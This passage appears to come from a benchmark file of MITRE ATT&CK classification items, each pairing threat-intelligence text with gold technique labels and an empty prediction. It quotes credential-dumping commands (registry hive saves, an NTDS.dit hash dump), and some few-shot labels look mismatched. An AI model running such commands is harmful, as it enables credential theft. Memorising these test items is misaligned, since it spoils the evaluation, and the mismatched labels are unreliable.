IDs with their names.\n\nExamples:\n- Text: Carberp has attempted to disable security software by creating a suspended process for the security software and injecting code to delete antivirus core files when the process is resumed.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n- Text: Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Extract and run additional tools: update.bat, which was extracted and started by setup.bat, uses the password hackemall to extract the next stages: cache.bat, msrun.bat and bcd.bat. Corrupt the boot: bcd.bat is used in order to harm the boot process\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1489: Service Stop\n- Text: LoudMiner harvested system resources to mine cryptocurrency, using XMRig to mine Monero.\n\t - T1496: Resource Hijacking\n", + "input": "MegaCortex was used to kill endpoint security processes.", + "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands. BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators\n\t - T1102.001: Web Service - Dead Drop Resolver\n- Text: SysUpdate can deobfuscate packed binaries in memory.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Invoke-Obfuscation calls the variable obfuscation technique used by the actors to obfuscate this script Random Case + {} + Ticks, which changes all variables in the script to have randomly cased characters, to be surrounded in curly braces and to include the tick (`) character, which is ignored in by PowerShell\n\t - T1027: Obfuscated Files or Information\n", + "input": "APT39 has used malware to drop encrypted CAB files.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: runs the net view /domain and net view commands.\n\t - T1018: Remote System Discovery\n- Text: Disttrack uses the internal domain names and credentials to log into remote systems on the same network segment\n\t - T1016: System Network Configuration Discovery\n- Text: Avira\u2019s Advanced Threat Research team, has been tracking Mustang Panda APT for a while. According to Avira\u2019s telemetry data, Mustang Panda mostly targets Asia-Pacific (APAC) countries and uses Cobalt or PlugX as payload\n\t - T1204.002: User Execution - Malicious File\n\t - T1049: System Network Connections Discovery\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1057: Process Discovery\n\t - T1016: System Network Configuration Discovery\n\t - T1083: File and Directory Discovery\n", + "input": "HermeticWizard can find machines on the local network by gathering known local IP addresses through `DNSGetCacheDataTable`, `GetIpNetTable`,`WNetOpenEnumW(RESOURCE_GLOBALNET, RESOURCETYPE_ANY)`,`NetServerEnum`,`GetTcpTable`, and `GetAdaptersAddresses.`", + "gold": "- T1018: Remote System Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Rclone can list files and directories with the `ls`, `lsd`, and `lsl` commands.\n\t - T1083: File and Directory Discovery\n- Text: This static set of characteristics, combined with the minimal use of obfuscation in their phishing attacks, may benefit organizations that are potential targets for IRON TILDEN.ToolsTaegis\u2122 XDR Adversary Software Coverage Tool\n\t - T1221: Template Injection\n- Text: Silence has sent emails with malicious DOCX, CHM, LNK and ZIP attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", + "input": "Mustang Panda has searched the entire target system for DOC, DOCX, PPT, PPTX, XLS, XLSX, and PDF files.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly 2.0 created a directory named \"out\" in the user's %AppData% folder and copied files to it.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: Carberp has created a hidden file in the Startup folder of the current user.\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n- Text: determines a working directory where it stores all the gathered data about the compromised machine.\n\t - T1074: Data Staged\n", + "input": "TEMP.Veles has created staging folders in directories that were infrequently used by legitimate users or processes.", + "gold": "- T1074.001: Data Staged - Local Data Staging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This marker indicates the presence of an encrypted MZ marker in the .hwp file and is decrypted by the malware and written to the Startup folder for the user: C:\\Documents and Settings\\\\Start Menu\\Programs\\Startup\\viso.exe This step establishes the persistence of the malware across reboots on the endpoint Once the decrypted MZ marker is written to the Startup folder, the 2.hwp is deleted from the endpoint The malware might perform this activity for a couple of reasons: Establish persistence for itself on the endpoint Establish persistence of another component of the malware on the endpoint Update itself on endpoint after a separate updater component downloads the update from the control server The malware has limited reconnaissance and data-gathering capabilities and is not full-fledged spyware\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: OilRig has abused the Outlook Home Page feature for persistence. OilRig has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse.\n\t - T1137.004: Office Application Startup - Outlook Home Page\n- Text: The use of large size files to avoid detection by security solutions with hardcoded size limits for \u2018efficiency\u2019. - A fishing-with-dynamite approach to collecting initial access to victims with low-cost tooling\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n", + "input": "Higaisa added a spoofed binary to the start-up folder for persistence.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The actors used the ntdsutil.exe utility, which was present on a target's Active Directory\u00ae server to export the Active Directory database for credential access.\n\t - T1003.003: OS Credential Dumping - NTDS\n- Text: Another interesting discovery was a tool that was used during attacks to make queries to Active Directory using LDAP. This tool is able to dump detailed information about computers and usernames listed in Active Directory, and is tailored for a specific victim\u2019s domain\n\t - T1018: Remote System Discovery\n\t - T1087.002: Account Discovery - Domain Account\n- Text: During Operation CuckooBees, the threat actors leveraged a custom tool to dump OS credentials and used following commands: `reg save HKLM\\\\SYSTEM system.hiv`, `reg save HKLM\\\\SAM sam.hiv`, and `reg save HKLM\\\\SECURITY security.hiv`, to dump SAM, SYSTEM and SECURITY hives.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n", + "input": "Chimera has gathered the SYSTEM registry and ntds.dit files from target systems. Chimera specifically has used the NtdsAudit tool to dump the password hashes of domain users via \"msadcs.exe \"NTDS.dit\" -s \"SYSTEM\" -p RecordedTV_pdmp.txt --users-csv RecordedTV_users.csv\" and used ntdsutil to copy the Active Directory database.", + "gold": "- T1003.003: OS Credential Dumping - NTDS", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Stealth Falcon malware creates a scheduled task entitled \u201cIE Web Cache\u201d to execute a malicious file hourly.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. CTU researchers identified an xxmm builder for xxmm (see Figure 2), which suggests that the threat actors customize the xxmm malware settings based on the target. MSGet \u2014 This persistent downloader uses a dead-drop resolver (DDR) to download and execute another malicious payload. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. Use the \u2018at' or \u2018schtask' commands to register a scheduled task to be executed in a few minutes. Use malware to upload the large list of enumerated files to the C2 server. Use downloaders or other malware to send the new list to a compromised host. Use an uploader or other malware to send the archived files to an attacker-controlled server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity\n\t - T1053.002: Scheduled Task/Job - At\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description \u201cWindows Check AV\u201d in an apparent attempt to masquerade as a legitimate service.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", + "input": "The different components of Machete are executed by Windows Task Scheduler.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Pupy can communicate over HTTP for C2.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: Check for Skype connectivity - Download and install Skype - Encoded communication with its C2 - Execute commands sent from the C2 server - Get multifactor authentication settings - Get the currently logged on user and OS version\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: Bankshot generates a false TLS handshake using a public certificate to disguise C2 network communications.\n\t - T1001.003: Data Obfuscation - Protocol Impersonation\n", + "input": "Zebrocy uses HTTP for C2.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Executive summary . The PROMETHIUM threat actor \u2014 active since 2012 \u2014 has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The group has at least four new trojanized setup files we observed: Firefox (a browser), VPNpro (a VPN client), DriverPack (a pack of drivers) and 5kPlayer (a media player). How did it work. Talos could not pinpoint the initial attack vector, however, the use of trojanized installation files to well-known applications is consistent with the previously documented campaigns. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. We can conclude that the PROMETHIUM threat actor is interested in new countries or the malicious framework developed by this threat actor is exported in more countries than previously thought. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. The malicious service: rmaserv.exe . This binary has two main features. Conclusion . The PROMETHIUM threat actor is dedicated and resilient, exposing them hasn't refrained them from moving forward with their agenda\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: GoldMax has impersonated systems management software to avoid detection.\n\t - T1036.004: Masquerading - Masquerade Task or Service\n- Text: Adversaries can instruct to spread laterally by copying itself to shares it has enumerated and for which it has obtained legitimate credentials (via keylogging or other means). The remote host is then infected by using the compromised credentials to schedule a task on remote machines that executes the malware.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n\t - T1078: Valid Accounts\n", + "input": "GoldMax has used filenames that matched the system name, and appeared as a scheduled task impersonating systems management software within the corresponding ProgramData subfolder.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Before evidence of BlackEnergy2 use in targeted attacks was uncovered, we tracked strange activity on one of the BlackEnergy CnC servers in 2013. This strangeness was related to values listed in newer BlackEnergy configuration files. As described in Dmitry\u2019s 2010 Black DDoS\u2019 analysis, a configuration file is downloaded from the server by main.dll on an infected system. The config file provides download instructions for the loader. In this particular case in 2013, the config file included an unknown plugin set, aside from the usual \u2018ddos\u2019 plugin listing. Displayed below are these new, xml formatted plugin names \u201cweap_hwi\u201d, \u201cps\u201d, and \u201cvsnet\u201d in a BlackEnergy configuration file download from a c2 server. This new module push must have been among the first for this group, because all of the module versions were listed as \u201cversion 1\u201d, including the ddos plugin\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n- Text: HOPLIGHT has the capability to harvest credentials and passwords from the SAM database.\n\t - T1003.002: OS Credential Dumping - Security Account Manager\n- Text: During Operation Wocao, threat actors accessed and collected credentials from password managers.\n\t - T1555.005: Credentials from Password Stores - Password Managers\n", + "input": "Pysa has extracted credentials from the password database before encrypting the files.", + "gold": "- T1552.001: Unsecured Credentials - Credentials In Files", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: collects information about running processes.\n\t - T1057: Process Discovery\n- Text: 1) Function similarity \u2013 Important functions in both BYEBY and wincore.dll have almost the same implementation. One such function is the payloads\u2019 main thread function.\n\t - T1588.001: Obtain Capabilities - Malware\n\t - T1055.003: Process Injection - Thread Execution Hijacking\n- Text: EXOTIC LILY has created e-mail accounts to spoof targeted organizations.\n\t - T1585.002: Establish Accounts - Email Accounts\n", + "input": "During FunnyDream, the threat actors used Tasklist on targeted systems.", + "gold": "- T1057: Process Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Mimikatz credential dumper contains an implementation of an SSP.\n\t - T1547.005: Boot or Logon Autostart Execution - Security Support Provider\n- Text: Earth Lusca has used ProcDump to obtain the hashes of credentials by dumping the memory of the LSASS process.\n\t - T1003.001: OS Credential Dumping - LSASS Memory\n- Text: The attack targeted at least one organization in Saudi Arabia, which aligns with the targeting of the initial Shamoon attacks. It appears the purpose of the new Disttrack samples were solely focused on destruction, as the samples were configured with a non-operational C2 server to report to and were set to begin wiping data exactly on 2016/11/17 20:45. Disttrack uses the internal domain names and credentials to log into remote systems on the same network segment. The dropper then attempts to open the service manager on each remote system to start the RemoteRegistry service, which it will connect to using RegConnectRegistryW. The dropper then checks to see if it has administrator privileges on the remote system by attempting to open \"\\system32\\csrss.exe\", which allows it to determine if it can write its payload to the \"\\system32\" folder on the remote system. Scheduled tasks require a time in which the task will run, which the dropper determines by calling the function NetRemoteTOD to obtain the time of day from the remote system. While completely speculative, the word \u201cshinu\u201d used as a parameter could be a reference to the Arabic slang for the word \u201cwhat\u201d, as well as a reference to a village name in northwestern Iran. It appears that the \u201cdrdisk.sys\u201d driver (SHA256: 4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6) is the exact same driver as used in the Shamoon attack in 2012. During this activity, we noticed the wiper changing the system time to August 2012, as the temporary license key for the RawDisk driver requires the system time to not exceed the month of August, which is when the temporary license would expire. The current attack campaign has several TTP overlaps with the original Shamoon campaign, especially from a targeting and timing perspective\n\t - T1036.004: Masquerading - Masquerade Task or Service\n", + "input": "Empire can enumerate Security Support Providers (SSPs) as well as utilize PowerSploit's \"Install-SSP\" and \"Invoke-Mimikatz\" to install malicious SSPs and log authentication events.", + "gold": "- T1547.005: Boot or Logon Autostart Execution - Security Support Provider", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group has changed memory protection permissions then overwritten in memory DLL function code with shellcode, which was later executed via KernelCallbackTable hijacking. Lazarus Group has also used shellcode within macros to decrypt and manually map DLLs into memory at runtime.\n\t - T1620: Reflective Code Loading\n- Text: 1) The script uses the function fromCharCode() that returns a string created from a sequence of UTF-16 code units. By using this function, it avoids explicitly writing commands it wants to execute and it hides the actual code it is initiating. In particular, the script uses this function to hide information related to process names. To the best of our knowledge, this method was not used in early versions of the spam campaign. 2) The script uses the function radador(), which returns a randomized integer. In contrast to the first method of obfuscation, this has been used effectively since early versions of the Astaroth Trojan campaign\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Chinese state-sponsored cyber actors have been observed: \uf0b7 Injecting into the rundll32.exe process to hide usage of Mimikatz, as well as injecting into a running legitimate explorer.exe process for lateral movement. \uf0b7 Using shellcode that injects implants into newly created instances of the Service Host process (svchost).\n\t - T1055.001: Process Injection - Dynamic-link Library Injection\n\t - T1055.002: Process Injection - Portable Executable Injection\n", + "input": "Lokibot has reflectively loaded the decoded DLL into memory.", + "gold": "- T1620: Reflective Code Loading", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Next, REvil checks the configuration field dbg to see if it\u2019s running in debug mode. If that is not the case, geolocation checks based on the system\u2019s language and the keyboard layout are conducted so the ransomware does not attempt to encrypt files on whitelisted systems. The following are whitelisted system language IDs for the analyzed sample\n\t - T1082: System Information Discovery\n- Text: Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.\n\t - T1014: Rootkit\n\t - T1542.001: Pre-OS Boot - System Firmware\n- Text: No matching sample found for T1542\n", + "input": "APT37 collects the computer name, the BIOS model, and execution path.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. Afterward, the module will delete old \"sft\" files assuming they were already exfiltrated. After a pause of 6,500 milliseconds, it will start its search for the targeted files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp\n\t - T1083: File and Directory Discovery\n- Text: The following commands were used to create and add the DefaultUser account to the local Administrators group, and subsequently hide the account from the Windows logon screen\n\t - T1087.001: Account Discovery - Local Account\n\t - T1098: Account Manipulation\n\t - T1136.001: Create Account - Local Account\n\t - T1564.002: Hide Artifacts - Hidden Users\n- Text: HAMMERTOSS has used \"-WindowStyle hidden\" to conceal PowerShell windows.\n\t - T1564.003: Hide Artifacts - Hidden Window\n", + "input": "SysUpdate has the ability to set file attributes to hidden.", + "gold": "- T1564.001: Hide Artifacts - Hidden Files and Directories", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The HTTP request retrieves contents of the files present in the repository with an interesting validation which checks that the retrieved file is a PNG. The file that was earlier retrieved was named \u201creadme.png\u201d; this PNG file has one of the malicious modules embedded in it. It then executes GetNumberOfMethods and saves the result obtained by the module. This file committed to the repo contains the result of the commands executed by the module on the target system. To commit the file the malware makes a PUT HTTP request to Github\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n- Text: LookBack has a C2 proxy tool that masquerades as \"GUP.exe\", which is software used by Notepad++.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: Ursnif has copied itself to and infected files in network drives for propagation.\n\t - T1080: Taint Shared Content\n", + "input": "Transparent Tribe can hide legitimate directories and replace them with malicious copies of the same name.", + "gold": "- T1564.001: Hide Artifacts - Hidden Files and Directories", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ramsay can use the Windows COM API to schedule tasks and maintain persistence.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n- Text: COMSysApp service is first configured to autostart and the binpath of the service is set to svchost.exe. COMSysApp service is added under the \u201cSvcHost\u201d key as a preliminary step to its execution in the context of svchost.exe. The malicious DLL is added as a service DLL of COMSysApp. COMSysApp service is restarted\n\t - T1546.015: Event Triggered Execution - Component Object Model Hijacking\n- Text: can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.\n\t - T1021.003: Remote Services - Distributed Component Object Model\n", + "input": "Ursnif droppers have used COM objects to execute the malware's full executable payload.", + "gold": "- T1559.001: Inter-Process Communication - Component Object Model", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CookieMiner issues a series of commands to configure the victim\u2019s machine to mine cryptocurrency and maintain persistence (Figure 6). The program xmrig2 is a Mach-O executable for mining cryptocurrency. As seen in Figure 7, the address \u201ck1GqvkK7QYEfMj3JPHieBo1m7FUkTowdq6H\u201d has considerable mining performance. It has been ranked as a top miner in the Maruru mining pool (koto-pool.work).\u00ad\u00ad\u00ad The cryptocurrency mined is called Koto, which is a Zcash-based anonymous cryptocurrency. The has addresses in Figure 8 use the \u201cYescrypt\u201d algorithm which is good for CPU miners but not ideal for GPU miners. This is ideal for malware as the victim hosts are not guaranteed to have discrete GPUs installed in them but are guaranteed to have a CPU available. We believe the malware authors may have intentionally used this filename to create confusion since the miner is actually mining the Koto cryptocurrency\n\t - T1543.001: Create or Modify System Process - Launch Agent\n- Text: SysUpdate can search files on a compromised host.\n\t - T1083: File and Directory Discovery\n- Text: Recursively generate a list of files in a directory and send to the control server - Terminate a specific process. The process is identified by the control server sending the PID to the malware\n\t - T1057: Process Discovery\n\t - T1543.003: Create or Modify System Process - Windows Service\n\t - T1119: Automated Collection\n", + "input": "CrossRAT can list all files on a system.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: used a cloud-based remote access software called LogMeIn for their attacks.\n\t - T1219: Remote Access Software\n- Text: APT41 used RDP for lateral movement.\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: MacMa can manage remote screen sessions.\n\t - T1021: Remote Services\n", + "input": "DarkVishnya used DameWare Mini Remote Control for lateral movement.", + "gold": "- T1219: Remote Access Software", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: We were able to source a sample that may be the malware involved in the May 2018 attacks. We ran it, and it broke the boot sector as expected (see Figure 1). An initial analysis of the file revealed it was created using Nullsoft Scriptable Install System (NSIS), an open-source application used to create setup programs. The actor behind this threat used the application and purposely named it \u201cMBR Killer. There are no indications of network-related behavior in this malware\n\t - T1027: Obfuscated Files or Information\n- Text: During Operation Sharpshooter, the threat actors used a VBA macro to execute a simple downloader that installed Rising Sun.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: (For more on steganography, see the McAfee Labs Threats Report, June 2017, page 33.) The implants covered in this research establish a permanent presence on the victim\u2019s system once the PowerShell implant is executed\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "Leafminer obfuscated scripts that were used on victim machines.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: NotPetya will reboot the system one hour after infection.\n\t - T1529: System Shutdown/Reboot\n- Text: APT29 has embedded an ISO file within an HTML attachment that contained 